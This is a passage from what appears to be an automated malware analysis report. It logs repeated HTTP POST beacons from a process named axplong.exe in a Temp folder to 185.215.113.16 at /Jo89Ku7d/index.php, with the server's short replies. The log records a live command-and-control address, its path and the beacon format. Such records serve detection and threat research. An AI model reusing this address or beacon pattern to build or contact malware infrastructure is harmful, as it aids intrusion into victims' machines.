                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.549715185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:06.855494022 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:07.586081982 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:07.586807013 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:07.814698935 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.549716185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:07.937638998 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:08.689390898 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:08.704065084 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:08.930530071 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.549717185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:09.047137022 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:09.737123013 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:09.737988949 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:09.961215019 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.549718185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:10.084666014 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:10.794328928 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:10.798983097 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:11.048597097 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.549719185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:11.168142080 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:12.012074947 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:12.013063908 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:12.236385107 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.549720185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:12.357697010 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:13.058492899 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:13.059215069 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:13.304394960 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.549721185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:13.417876005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:14.153135061 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:14.153961897 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:14.382499933 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.549722185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:14.498296976 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:15.349714994 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:15.350593090 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:15.579698086 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.549723185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:15.700742960 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:16.506740093 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:16.507663965 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:16.778635979 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.549724185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:16.886677980 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:17.633979082 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:17.640093088 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:17.883949995 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.549725185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:17.996773958 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:18.713627100 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:18.714381933 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:18.977169037 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.549726185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:19.091345072 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:19.815109015 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:19.816308022 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:20.039165974 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
